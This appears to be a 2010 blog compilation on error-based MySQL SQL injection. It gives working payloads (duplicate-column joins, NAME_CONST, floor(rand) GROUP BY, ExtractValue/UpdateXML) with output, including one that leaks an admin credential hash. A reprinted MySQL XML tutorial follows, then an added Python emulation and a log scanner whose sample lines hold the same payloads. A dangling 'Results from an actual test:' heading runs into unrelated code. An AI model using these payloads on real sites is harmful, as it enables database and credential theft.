
Using MySQL error messages in SQL injection

2010-06-12

In many situations we cannot inject directly and conveniently, which is why BENCHMARK-based time-delay injection exists; but if MySQL's error messages can be obtained, there is now an even more convenient method.
Two or three such methods are circulating online; I recorded one of them on this blog earlier.
===========================================

New tips for MySQL injection

// Using a MySQL error to leak column names
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B) C;
ERROR 1060 (42S21): Duplicate column name 'Host'
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host)) C;
ERROR 1060 (42S21): Duplicate column name 'User'
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host,User)) C;
ERROR 1060 (42S21): Duplicate column name 'Password'
.....
// Obtaining information
// Possibly a version issue; my test did not succeed
mysql> SELECT NAME_CONST((SELECT Host FROM user LIMIT 0,1),0);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST
It seems the arguments to NAME_CONST must be constants, or something like that; unfortunate.
I'll test it properly next time.


Update: it is indeed a version issue (newer versions require all arguments to be constants, otherwise an error is raised), so this method does not seem very portable.
mysql> SELECT version();
+---------------------+
| version()           |
+---------------------+
| 5.0.27-community-nt |
+---------------------+
1 row in set (0.00 sec)

mysql> SELECT NAME_CONST((SELECT user()),0);
+----------------+
| root@localhost |
+----------------+
|              0 |
+----------------+
1 row in set (0.00 sec)

-------------------------------------
mysql> SELECT version();
+------------------+
| version()        |
+------------------+
| 5.1.35-community |
+------------------+
1 row in set (0.00 sec)

mysql> SELECT NAME_CONST((SELECT version()),0);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST

==============================================

Another method, which I saw on t00ls a while ago:
http://www.t00ls.net/thread-8745-1-4.html
Something like this:
mysql> SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT 'x'))a from information_schema.tables group by a)b;
ERROR 1062 (23000): Duplicate entry '1x' for key 'group_key'
This method has no particular MySQL version requirement, but it can only leak 64 bytes of data; for larger data you have to work through it piece by piece with MID().
The last method (MySQL 5.1+ only)
==========================================================

mysql exploitation with error messages
2010-07-07 10:30

A Russian presentation on exploiting SQL injection:

http://devteev.blogspot.com/2009/10/advanced-sql-injection-lab-full-pack.html

Of all the slides, I particularly liked the one in which the author demonstrates that if the MySQL error messages have been enabled (using the mysql_error() function), then it is possible to retrieve data from the back-end database using the ExtractValue() function:
——————————————
>SELECT 1 AND ExtractValue(1, CONCAT(0x5c, (SELECT @@VERSION)))

produces:

Error Code : 1105
XPATH syntax error: ' .1.44-community'

———————-
This should not be confused with the PHP errors. While the PHP errors are usually enabled, it's not "very" common to see developers printing the MySQL errors using the mysql_error() function. However, it's still good to know and could sometimes come in handy.

Overall, very nice presentation.

====================================================

Data is leaked by passing the ExtractValue function an argument that violates XPath syntax rules, so that the offending value is echoed back in the error message.
For the ExtractValue and UpdateXML functions, see: http://dev.mysql.com/tech-resources/articles/mysql-5.1-xml.html
===========================================

MySQL 5.1's New XML Functions

MySQL version 5.1.5 has functions for searching and changing XML documents. This article has examples.

Let's make a database and put two XML documents in it.

CREATE TABLE x (doc VARCHAR(150));
INSERT INTO x VALUES
('
<book>
<title>A guide to the SQL standard</title>
<author>
<initial>CJ</initial>
<surname>Date</surname>
</author>
</book>
');
INSERT INTO x VALUES
('
<book>
<title>SQL:1999</title>
<author>
<initial>J</initial>
<surname>Melton</surname>
</author>
</book>
');

The doc columns have an internal hierarchical structure, with books containing titles and authors, and authors in turn containing initials and surnames. It's a popular way to format and store data, and the "markup" -- words like "<book>" and "</book>" -- makes it easy to see the hierarchy if you're careful about indentation.

ExtractValue()

Syntax
EXTRACTVALUE (XML_document, XPath_string);
1st Parameter
XML_document string formatted as in the example
2nd Parameter
XPath_string (XPath is a "sub-language")
Action
returns string containing a value from the document
Example #E1
mysql> SELECT EXTRACTVALUE(doc,'/book/author/initial') FROM x;
+------------------------------------------+
| EXTRACTVALUE(doc,'/book/author/initial') |
+------------------------------------------+
| CJ |
| J |
+------------------------------------------+
2 rows in set (0.01 sec)

What happened here? Books contain authors which contain initials. With EXTRACTVALUE() we navigated down through the hierarchy to get the values at the final node points: 'CJ' and 'J'. A basic extraction is just a matter of specifying the hierarchy in the XPath_string argument.

Example #E2
mysql> SELECT EXTRACTVALUE(doc,'/*/*/initial') FROM x;
+----------------------------------+
| EXTRACTVALUE(doc,'/*/*/initial') |
+----------------------------------+
| CJ |
| J |
+----------------------------------+
2 rows in set (0.01 sec)

You don't have to list the whole hierarchy. When part of a path is a wildcard, that means "any name will do".

Example #E3
mysql> SELECT extractValue(doc,'/book/child::*') FROM x;
+---------------------------------------------+
| extractValue(doc,'/book/child::*') |
+---------------------------------------------+
| A guide to the SQL standard |
| SQL:1999 |
+---------------------------------------------+
2 rows in set (0.00 sec)

With /book/child:: we find what's immediately below book, namely the title data. We could use a variety of operators here:
child ... what's immediately below
descendant ... what's below at all levels
parent ... what's immediately above
ancestor ... what's above at all levels
following-sibling ... what's next at same level
preceding-sibling ... what's before at same level
self ... not before, not after, same level

Example #E4
mysql> select
extractValue(doc,'/book/author/surname[self:text()="Date"]') from x;
+--------------------------------------------------------------+
| extractValue(doc,'/book/author/surname[self:text()="Date"]') |
+--------------------------------------------------------------+
| Date |
| |
+--------------------------------------------------------------+
2 rows in set (0.00 sec)

And here's one way to add a predicate (a conditional expression). By saying "in the text of self, that is, in the text of surname because the predicate immediately comes after surname, look for value = Date", we include book/author/surname=Date and we exclude book/author/surname=Melton. The Melton row is blank. Naturally = isn't the only operator we could use here; we could have self:text()>="Date", self:text()="Date" OR self:text()="Melton", and so on.

What you've seen is: an XPath expression can contain nodes separated by slashes (vaguely like a Unix path expression), and you can pick values from one or more nodes. Wildcards, navigation aids, and predicates are supported. Although the examples all used extractValue() in the SELECT list, it can be used in any statement wherever an expression is allowed. A good tip is to combine XML columns with fulltext indexing.

UpdateXML()

Now here's a new function for updating the structure.

Syntax
UPDATEXML (XML_document, XPath_string, new_value);
1st Parameter
XML_document string formatted as in the example
2nd Parameter
XPath_string (XPath is a "sub-language")
3rd Parameter
new_value to replace whatever is found
Action
returns the document string with the matched node replaced by new_value
Example #U1
mysql> select UpdateXML(doc,'/book/author/initial','!!') from x;
+----------------------------------------------------------+
| UpdateXML(doc,'/book/author/initial','!!') |
+----------------------------------------------------------+
|
<book>
<title>A guide to the SQL standard</title>
<author>
!!
<surname>Date</surname>
</author>
</book> |
|
<book>
<title>SQL:1999</title>
<author>
!!
<surname>Melton</surname>
</author>
</book> |
+----------------------------------------------------------+
2 rows in set (0.00 sec)

UpdateXML's first two arguments are the same as for ExtractValue because the first thing we want to do is navigate to the node. The third argument is a replacement string. So we change book/author/initial to !!. The return value is the complete new document. To replace the document permanently, you could say UPDATE x SET doc = UpdateXML(doc,'/book/author/initial','!!');

But this is probably a mistake! We didn't just change the text to !!. We changed <initial>CJ</initial> to !!, so we changed the document structure. Normally, we only want to change the contents. For that, we should say: select UpdateXML(doc,'/book/author/initial','<initial>!!</initial>') from x;

Example #U2
mysql> select extractvalue(UpdateXML(doc,'/book/author/initial','<initial>!!</initial>'),'/book/author/initial') from x;
+----------------------------------------------------------------------------------------------------+
| extractvalue(UpdateXML(doc,'/book/author/initial','<initial>!!</initial>'),'/book/author/initial') |
+----------------------------------------------------------------------------------------------------+
| !!                                                                                                 |
| !!                                                                                                 |
+----------------------------------------------------------------------------------------------------+
2 rows in set (0.01 sec)

This final example, a combination of ExtractValue() and UpdateXML(), shows what would happen if we change the initial node to !! and then select the initial node. Naturally, we get !!.
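The navigation and replacement behaviour shown in examples E1 to E4 and U1 to U2 can be reproduced outside MySQL. The following Python is an added example, not part of the article and not MySQL's implementation: it emulates ExtractValue() and UpdateXML() with the standard library's ElementTree over the same two <book> documents (constructed inline, whitespace removed). The function names extract_value and update_xml are this example's own, and only the XPath subset that ElementTree's findall() understands is supported, so MySQL's absolute paths ('/book/author/initial') are written relative to the root element ('author/initial') here.

```python
"""Python analogue of MySQL's ExtractValue()/UpdateXML() over the article's two documents.
Constructed example: uses the standard library's ElementTree, not MySQL, and supports only
the XPath subset that ElementTree's find()/findall() understand."""
import xml.etree.ElementTree as ET

# The two <book> documents the article inserts into table x (whitespace removed).
DOCS = [
    "<book><title>A guide to the SQL standard</title>"
    "<author><initial>CJ</initial><surname>Date</surname></author></book>",
    "<book><title>SQL:1999</title>"
    "<author><initial>J</initial><surname>Melton</surname></author></book>",
]


def _direct_text(elem):
    """Text that belongs directly to elem (XPath text()), not text of its descendants."""
    pieces = [elem.text or ""] + [child.tail or "" for child in elem]
    return " ".join(p.strip() for p in pieces if p.strip())


def extract_value(doc, path):
    """ExtractValue analogue: direct text of every node matched by `path`, space-joined.

    MySQL paths start at the document ('/book/author/initial'); ElementTree paths are
    relative to the root element, so the same query is written 'author/initial' here.
    A wildcard step is '*' and a text predicate is "surname[.='Date']".
    """
    root = ET.fromstring(doc)
    matches = [root] if path == "." else root.findall(path)
    return " ".join(t for t in (_direct_text(m) for m in matches) if t)


def update_xml(doc, path, new_value):
    """UpdateXML analogue: replace the single node matched by `path` with `new_value`.

    Like MySQL, the document is returned unchanged unless exactly one node matches.
    If new_value parses as XML it becomes a new element; otherwise the matched element
    disappears and the plain text takes its place, which is the structural change the
    article warns about in example U1.
    """
    root = ET.fromstring(doc)
    targets = root.findall(path)
    if len(targets) != 1:
        return doc
    target = targets[0]
    parent = next((p for p in root.iter() if target in list(p)), None)
    if parent is None:          # replacing the root element is not supported here
        return doc
    idx = list(parent).index(target)
    tail = target.tail or ""
    try:
        replacement = ET.fromstring(new_value)
    except ET.ParseError:
        replacement = None      # plain text, not an XML fragment
    parent.remove(target)
    if replacement is not None:
        replacement.tail = tail
        parent.insert(idx, replacement)
    elif idx == 0:              # text goes where the element was: before the next sibling
        parent.text = (parent.text or "") + new_value + tail
    else:
        prev = parent[idx - 1]
        prev.tail = (prev.tail or "") + new_value + tail
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for doc in DOCS:
        print(extract_value(doc, "author/initial"))             # E1: CJ / J
        print(extract_value(doc, "*/initial"))                  # E2: wildcard step
        print(extract_value(doc, "*"))                          # E3: children of book
        print(extract_value(doc, "author/surname[.='Date']"))   # E4: predicate
        print(update_xml(doc, "author/initial", "!!"))          # U1: structure changed
        print(extract_value(update_xml(doc, "author/initial", "<initial>!!</initial>"),
                            "author/initial"))                  # U2: !!
```

Running it on the second document for E4 returns an empty string, which is the blank Melton row in the article's output, and U1 shows the <initial> element vanishing from the author node, which is exactly why the article recommends supplying a full <initial>!!</initial> fragment as the replacement.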

============================================

How it is used:
mysql> SELECT 1 FROM dede_admin WHERE updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1);
ERROR 1105 (HY000): XPATH syntax error: '[admin:7a57a5a743894a0e]'
More convenient and concise than the previous method, but it can only leak 32 bytes of data. Likewise, larger data has to be fetched piece by piece with MID().
Results from an actual test:
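Every technique in this post depends on two things a defender can watch for: the characteristic SQL primitives arriving in a request, and raw MySQL error text reaching the client. The following Python is an added example, not from this post or any of the sources it quotes. It scans constructed access-log lines (hosts, paths and timestamps are made up) for the error-based primitives described above, decoding URL encoding repeatedly so double-encoded payloads are not missed, and separately checks a response body for MySQL error strings that should never be echoed to users. The function names and the log format are this example's own assumptions.

```python
"""Detection of MySQL error-based injection attempts and MySQL error-message leaks.

Constructed example: the access-log lines, hostnames and paths below are made up.
Two checks are implemented:
  1. request side: URL-decoded request paths are matched against the error-based
     extraction primitives this post describes;
  2. response side: application output is checked for raw MySQL error text, the
     precondition all of these techniques rely on (mysql_error() reaching the client).
"""
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in a common-log-style layout (assumed format).
ACCESS_LOG = [
    '10.0.0.5 - - [12/Jun/2010:10:01:02 +0800] "GET /news.php?id=1 HTTP/1.1" 200',
    '10.0.0.9 - - [12/Jun/2010:10:01:07 +0800] "GET /news.php?id=1%20AND%20extractvalue(1,concat(0x5c,(select%20@@version))) HTTP/1.1" 500',
    '10.0.0.9 - - [12/Jun/2010:10:01:09 +0800] "GET /news.php?id=1%20AND%20updatexml(1,concat(0x5b,(select%20user()),0x5d),1) HTTP/1.1" 500',
    '10.0.0.9 - - [12/Jun/2010:10:01:12 +0800] "GET /news.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),version())a%20from%20information_schema.tables%20group%20by%20a)b) HTTP/1.1" 500',
    '10.0.0.9 - - [12/Jun/2010:10:01:15 +0800] "GET /news.php?id=1%20and%20name_const((select%20version()),0) HTTP/1.1" 500',
    '10.0.0.9 - - [12/Jun/2010:10:01:18 +0800] "GET /news.php?id=(select%20*%20from%20(select%20*%20from%20users%20a%20join%20users%20b)c) HTTP/1.1" 500',
    '10.0.0.7 - - [12/Jun/2010:10:02:00 +0800] "GET /search.php?q=xml%20functions HTTP/1.1" 200',
]

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# One signature per technique discussed in the post, matched against decoded text.
SIGNATURES = [
    ("error-based: ExtractValue/UpdateXML XPath error",
     re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)),
    ("error-based: duplicate entry via floor(rand(0)*2) ... GROUP BY",
     re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S)),
    ("error-based: NAME_CONST with subquery argument",
     re.compile(r"\bname_const\s*\(\s*\(\s*select\b", re.I)),
    ("error-based: duplicate column name via self-JOIN in derived table",
     re.compile(r"select\s+\*\s+from\s*\(\s*select\s+\*\s+from\s+(\w+)\s+\w+\s+join\s+\1\b", re.I)),
]

# Raw MySQL error strings quoted in the post, plus the generic parse error.
MYSQL_ERROR_LEAKS = re.compile(
    r"XPATH syntax error|Duplicate entry '.*?' for key 'group_key'"
    r"|Incorrect arguments to NAME_CONST|Duplicate column name"
    r"|You have an error in your SQL syntax",
    re.I,
)


def normalize(raw):
    """URL-decode until stable (defeats double encoding), then fold comments and whitespace."""
    decoded = raw
    for _ in range(3):
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)   # inline comments used as separators
    return re.sub(r"\s+", " ", decoded)


def scan_request(path):
    """Return the names of every signature that matches the decoded request path."""
    text = normalize(path)
    return [name for name, rx in SIGNATURES if rx.search(text)]


def scan_log(lines):
    """Parse access-log lines and return one finding per line that trips a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = scan_request(m["path"])
        if hits:
            findings.append({"client": m["client"], "time": m["time"],
                             "status": m["status"], "hits": hits})
    return findings


def leaks_mysql_error(body):
    """True if an HTTP response body contains raw MySQL error text."""
    return bool(MYSQL_ERROR_LEAKS.search(body))


if __name__ == "__main__":
    for finding in scan_log(ACCESS_LOG):
        print(finding)
```

The request-side signatures are deliberately narrow (they key on the specific primitives rather than on generic SQL keywords) so they can run over high-volume logs with few false positives; the response-side check is the one worth wiring into tests or a proxy, since an application that never returns mysql_error() output to the client removes the channel all four techniques use, and parameterised queries remove the injection itself.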
